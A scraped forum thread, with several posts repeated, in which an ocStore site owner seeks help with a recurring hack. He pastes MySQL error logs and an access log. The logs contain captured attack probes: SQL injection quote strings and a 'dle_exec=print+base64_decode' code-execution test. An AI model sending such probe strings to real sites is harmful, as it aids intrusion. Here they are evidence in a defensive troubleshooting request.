Надіслати Поділитися на інших сайтах More sharing options... afwollis Опубліковано: 13 липня 2015 Share Опубліковано: 13 липня 2015 зависит от формата лога. скорее всего "С данных ресурсов" "метод | запрошенный URL | протокол" | код ответа (статус) | объем переданных данных | "referer (откуда перешли)" Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 14 липня 2015 Share Опубліковано: 14 липня 2015 зависит от формата лога. скорее всего "С данных ресурсов" "метод | запрошенный URL | протокол" | код ответа (статус) | объем переданных данных | "referer (откуда перешли)" А как с данных, у меня нет закупленных ссылок и ничего подобного тем более с порно ресурсов, которые так же иногда проскакивают "зависит от формата лога" а как узнать его формат? Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 2 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Каждый день вредоносный код(((
afwollis Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 ...терь система ругается при каждом нажатии на панель управления в админке, потому как не находит файл test из той самой папки download...не "не находит", а "не может создать". ocStore проверяет права на директории. если цифровых товаров не предвидится - можно вообще убить эту директорию и выкусить из ocStore её проверку на корректные права. Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 9 липня 2015 Share Опубліковано: 9 липня 2015 Я вернул права на папку dowload 755 и ошибка админки ушла, по утру появилась другая 2015-07-09 4:51:15 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' OR `oldurl` LIKE ''' LIMIT 1' at line 1Error No: 1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''' OR `oldurl` LIKE '\'' OR `oldurl` LIKE ''' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php on line 492015-07-09 4:51:18 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' O' at line 1Error No: 1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' OR `oldurl` LIKE ''/www.liveinternet.ru/click'' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php on line 492015-07-09 4:51:33 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' O' at line 1Error No: 1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' OR `oldurl` LIKE ''/www.liveinternet.ru/click'' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php on line 49 закидывал в гугл запрос типа \ Error No: 1064<br />SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''' OR `oldurl` LIKE '\'' OR `oldurl` LIKE ' ничего не выдает до чистки зараженных файлов была подобная ошибка, которая собственно и подсказала о взломе только в ней было конкретно указано на характерную для хака кодировку 2015-06-17 19:07:23 - PHP Notice: Error: You have an error in your SQLsyntax; check the manual that corresponds to your MySQL server versionfor the right syntax to use near 'c3VrYWJseWF0ZGQ=');' OR `oldurl` LIKE'index.php?dle_exec=print+base64_decode(\'' at line 1Error No:1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE'index.php?dle_exec=print+base64_decode('c3VrYWJseWF0ZGQ=');' OR`oldurl` LIKE'index.php?dle_exec=print+base64_decode(\'c3VrYWJseWF0ZGQ=\');' OR`oldurl` LIKE'index.php?dle_exec=print+base64_decode('c3VrYWJseWF0ZGQ=');' LIMIT 1 in теперь совсем в растерянности Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 11 липня 2015 Share Опубліковано: 11 липня 2015 кто подскажет (взято из access.log) что это означает редирект или идет ссылка на данные ресурсы?Заранее спасибо! /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://pochemychka.net//detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://sady-urala.ru/"GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://www.ringporno.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://littleberry.ru/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://littleberry.ru/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "https://www.qitt.ru/""GET / HTTP/1.1" 200 16895 "http://burger-imperia.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://petrovka-online.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://tomck.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://amilogic.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://imperiafilm.ru/""GET / HTTP/1.1" 200 98657 "http://doska-vsem.ru/" Надіслати Поділитися на інших сайтах More sharing options... afwollis Опубліковано: 13 липня 2015 Share Опубліковано: 13 липня 2015 зависит от формата лога. скорее всего "С данных ресурсов" "метод | запрошенный URL | протокол" | код ответа (статус) | объем переданных данных | "referer (откуда перешли)" Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 14 липня 2015 Share Опубліковано: 14 липня 2015 зависит от формата лога. скорее всего "С данных ресурсов" "метод | запрошенный URL | протокол" | код ответа (статус) | объем переданных данных | "referer (откуда перешли)" А как с данных, у меня нет закупленных ссылок и ничего подобного тем более с порно ресурсов, которые так же иногда проскакивают "зависит от формата лога" а как узнать его формат? Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 2 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку
Stels32 Опубліковано: 9 липня 2015 Share Опубліковано: 9 липня 2015 Я вернул права на папку dowload 755 и ошибка админки ушла, по утру появилась другая 2015-07-09 4:51:15 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' OR `oldurl` LIKE ''' LIMIT 1' at line 1Error No: 1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''' OR `oldurl` LIKE '\'' OR `oldurl` LIKE ''' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php on line 492015-07-09 4:51:18 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' O' at line 1Error No: 1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' OR `oldurl` LIKE ''/www.liveinternet.ru/click'' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php on line 492015-07-09 4:51:33 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' O' at line 1Error No: 1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' OR `oldurl` LIKE ''/www.liveinternet.ru/click'' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php on line 49 закидывал в гугл запрос типа \ Error No: 1064<br />SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''' OR `oldurl` LIKE '\'' OR `oldurl` LIKE ' ничего не выдает до чистки зараженных файлов была подобная ошибка, которая собственно и подсказала о взломе только в ней было конкретно указано на характерную для хака кодировку 2015-06-17 19:07:23 - PHP Notice: Error: You have an error in your SQLsyntax; check the manual that corresponds to your MySQL server versionfor the right syntax to use near 'c3VrYWJseWF0ZGQ=');' OR `oldurl` LIKE'index.php?dle_exec=print+base64_decode(\'' at line 1Error No:1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE'index.php?dle_exec=print+base64_decode('c3VrYWJseWF0ZGQ=');' OR`oldurl` LIKE'index.php?dle_exec=print+base64_decode(\'c3VrYWJseWF0ZGQ=\');' OR`oldurl` LIKE'index.php?dle_exec=print+base64_decode('c3VrYWJseWF0ZGQ=');' LIMIT 1 in теперь совсем в растерянности Надіслати Поділитися на інших сайтах More sharing options...
Stels32 Опубліковано: 11 липня 2015 Share Опубліковано: 11 липня 2015 кто подскажет (взято из access.log) что это означает редирект или идет ссылка на данные ресурсы?Заранее спасибо! /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://pochemychka.net//detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://sady-urala.ru/"GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://www.ringporno.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://littleberry.ru/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://littleberry.ru/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "https://www.qitt.ru/""GET / HTTP/1.1" 200 16895 "http://burger-imperia.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://petrovka-online.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://tomck.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://amilogic.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://imperiafilm.ru/""GET / HTTP/1.1" 200 98657 "http://doska-vsem.ru/" Надіслати Поділитися на інших сайтах More sharing options...
afwollis Опубліковано: 13 липня 2015 Share Опубліковано: 13 липня 2015 зависит от формата лога. скорее всего "С данных ресурсов" "метод | запрошенный URL | протокол" | код ответа (статус) | объем переданных данных | "referer (откуда перешли)" Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 14 липня 2015 Share Опубліковано: 14 липня 2015 зависит от формата лога. скорее всего "С данных ресурсов" "метод | запрошенный URL | протокол" | код ответа (статус) | объем переданных данных | "referer (откуда перешли)" А как с данных, у меня нет закупленных ссылок и ничего подобного тем более с порно ресурсов, которые так же иногда проскакивают "зависит от формата лога" а как узнать его формат? Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 2 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0
Stels32 Опубліковано: 14 липня 2015 Share Опубліковано: 14 липня 2015 зависит от формата лога. скорее всего "С данных ресурсов" "метод | запрошенный URL | протокол" | код ответа (статус) | объем переданных данных | "referer (откуда перешли)" А как с данных, у меня нет закупленных ссылок и ничего подобного тем более с порно ресурсов, которые так же иногда проскакивают "зависит от формата лога" а как узнать его формат? Надіслати Поділитися на інших сайтах More sharing options...
Recommended Posts